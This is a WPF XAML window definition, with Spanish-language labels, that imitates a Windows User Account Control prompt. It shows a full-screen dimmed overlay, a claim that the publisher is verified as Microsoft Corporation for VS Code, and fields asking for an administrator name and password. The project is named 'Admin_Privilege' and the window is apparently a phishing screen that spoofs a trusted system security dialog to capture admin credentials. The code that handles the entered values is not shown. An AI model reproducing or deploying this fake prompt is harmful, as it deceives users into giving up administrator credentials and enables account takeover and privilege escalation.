MainWindow.xaml

<Window x:Class="Admin_Privilege.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:Admin_Privilege"
        mc:Ignorable="d"
        Title="Contrôle de compte d'utilisateur" 
        Width="1920" Height="1080"
        WindowStartupLocation="CenterScreen"
        WindowStyle="None" 
        ResizeMode="NoResize" 
        Background="Transparent" 
        AllowsTransparency="True">

    <Grid>
        <!-- Fondo negro transparente -->
        <Rectangle Fill="Black" Opacity="0.75" HorizontalAlignment="Stretch" VerticalAlignment="Stretch"/>

        <!-- Ventana centrada -->
        <Border x:Name="MainBorder" Width="546" Height="600" Background="White" HorizontalAlignment="Center" VerticalAlignment="Center" CornerRadius="10">
            <Grid>
                <Grid.RowDefinitions>
                    <RowDefinition Height="40"/>
                    <RowDefinition Height="*"/>
                    <RowDefinition Height="Auto"/>
                </Grid.RowDefinitions>

                <!-- Barra de título personalizada -->
                <Grid Background="#76B9ED" Grid.Row="0" MouseDown="TitleBar_MouseDown">
                    <Grid.ColumnDefinitions>
                        <ColumnDefinition Width="*"/>
                        <ColumnDefinition Width="Auto"/>
                    </Grid.ColumnDefinitions>
                    <TextBlock VerticalAlignment="Center" Margin="10" FontSize="10">
                        <Run Language="es-mx" Text="Control de Cuentas de Usuario"/>
                    </TextBlock>
                    <Button Content="&#x2716;" FontFamily="Segoe UI Symbol" FontSize="15" HorizontalAlignment="Right" Padding="15 5" Margin="10 0 10 10" Background="Transparent" Click="CloseButton_Click" BorderBrush="Transparent"/>
                </Grid>

                <!-- Contenido del UAC -->
                <StackPanel Background="#e6e6e6" Grid.Row="1" Name="MainPanel" VerticalAlignment="Top" Height="560" Grid.RowSpan="2">
                    <TextBlock TextWrapping="Wrap" Background="#76B9ED" Foreground="Black" FontWeight="Normal" FontSize="20" Padding="10">
                        <Run Language="es-mx" Text="¿Quieres permitir que esta aplicación realice cambios en tu dispositivo?"/>
                    </TextBlock>

                    <StackPanel Orientation="Horizontal" Margin="25 10">
                        <Image Source="/vscode.png" Width="50" Height="50"/>
                        <TextBlock Text="VS Code" VerticalAlignment="Center" Margin="10 0" FontSize="20" FontWeight="Normal"/>
                    </StackPanel>

                    <TextBlock Margin="20 5 20 0" FontSize="14">
                        <Run Language="es-mx" Text="Editor comprobado"/><Run Text=" : Microsoft Corporation"/>
                    </TextBlock>
                    <TextBlock Margin="20 0 20 0" FontSize="14">
                        <Run Language="es-mx" Text="Origen del archivo: Unidad de disco duro en este equipo"/>
                    </TextBlock>

                    <TextBlock Foreground="#0078D7" FontWeight="Bold" Margin="20 20 20 5" FontSize="15">
                        <Run Language="es-mx" Text="Mostrar más detalles"/>
                    </TextBlock>

                    <TextBlock Text="Para continuar, escriba un nombre de administrador y una contraseña." Margin="20 5" TextWrapping="Wrap" HorizontalAlignment="Left" FontSize="14"/>

                    <TextBlock Margin="20 5 20 0" TextWrapping="Wrap" HorizontalAlignment="Left" FontSize="12">
                        <Run Language="es-mx" Text="Nombre de Usuario"/><Run Text=" :"/>
                    </TextBlock>
                    <TextBox Name="Username" Margin="20 0 20 5" Width="344" Height="35" BorderThickness="2" HorizontalAlignment="Left" FontSize="14" Foreground="#606060"/>
                    <TextBlock Margin="20 5 20 0" TextWrapping="Wrap" HorizontalAlignment="Left" FontSize="12">
                        <Run Language="es-mx" Text="Contraseña"/><Run Text=" :"/>
                    </TextBlock>
                    <PasswordBox Name="Password" Margin="20 0 20 5" Width="344" Height="35" BorderThickness="2" HorizontalAlignment="Left" FontSize="14" Foreground="#606060"/>
                </StackPanel>

                <!-- Botones Si y No -->
                <StackPanel Grid.Row="2" Orientation="Horizontal" Height="45" Margin="20" HorizontalAlignment="Stretch" VerticalAlignment="Bottom">
                    <Button Content="Sí" Click="YesButton_Click" Margin="5 0" Background="#b8b8b8" BorderThickness="0" FontSize="16" Width="246" Height="35"/>
                    <Button Content="No" Click="NoButton_Click" Margin="5 0" Background="#b8b8b8" BorderThickness="0" FontSize="16" Width="246" Height="32"/>
                </StackPanel>
            </Grid>
        </Border>
    </Grid>
</Window>
